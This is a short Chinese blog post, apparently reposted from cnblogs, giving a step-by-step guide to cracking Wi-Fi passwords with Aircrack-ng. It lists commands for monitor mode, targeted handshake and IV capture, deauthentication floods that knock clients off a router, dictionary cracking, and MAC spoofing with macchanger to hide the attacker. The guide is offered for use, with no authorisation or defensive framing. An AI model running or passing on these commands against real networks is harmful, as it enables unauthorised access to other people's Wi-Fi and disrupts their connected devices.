无线密码获取

1、命令:

airmon-ng check kill结束进程

airmon-ng start wlan0 加载网卡

airodump-ng wlan0mon 建立监听

airodump-ng -c 13 --bssid DC:FE:18:1B:42:6B -w ~/ wlan0mo

airodump-ng --ivs -w xiaobai --bssid (mac地址) -c (信道) wlan0mon--ivs文件格式

-w xiaobai 文件名字此时能抓到就退出抓不到把攻击对方目标,使他重新握手,抓取密文

aireplay-ng -0 20 -a 路由器Mac地址 –c 客户机mac地址 wlan0mon

-0 :发送工具数据包的数量,这里是20个(或者无限次攻击改成0 )这样就能获得密文

aircrack-ng xiaobai.ivs -w 字典名

就这样开始破解了

2、实现步骤

  • 1. 修改无线网卡状态:先 down 掉
  • 2. 伪造无线网卡的 MAC 地址:安全起见。
  • 3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡
  • 4. 修改无线网卡状态: up
  • 5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标
  • 6. 监听抓包:生成 .cap 或 .ivs
  • 7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包
  • 8. 破解 .cap 或 .ivs ,获得 WEP 密码,完成破解
  • 9、个人认为复杂的密码应该搞不出来,(因为密码复杂了字典就大了,电脑就带不动了)
  • 10、注意无线网卡必须要带有监听的才行

3、使用到的工具

  • 1、Aircrack-ng工具包
    • 1、airmon-ng:处理网卡工作模式
    • 2、airodump-ng:抓包
    • 3、aircrack-ng:破解
    • 4、airepay-ng:发包、干扰
  • 2、ifconfig:查看修改网卡状态
    • 1、ifconfig wlan0 down:禁用网卡
    • 2、ifconfig wlan0 up:启用网卡
    • 3、目的是为了修改MAC地址
  • 3、macchanger:伪造MAC
    • -h 显示帮助
    • -V 显示版本
    • -s 显示当前MAC
    • -e 不改变mac,使用硬件厂商写入的MAC
    • -a 自动生成一个同类型的MAC,同厂商的
    • -A 自动生成一个不同类型的MAC,不同厂商的
    • -r 生成任意MAC
    • -l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出
    • 来是哪个厂商生产的产品
    • -m 设置一个自定义的MAC
    • 如: macchanger --mac=00:34:00:00:00:00 ath0 。
  • 4、iwconfig:针对无线网卡的工具
  • 5、iwlist:获取无线网络更详细的命令
原文地址:https://www.cnblogs.com/zhouxiangfei/p/12547506.html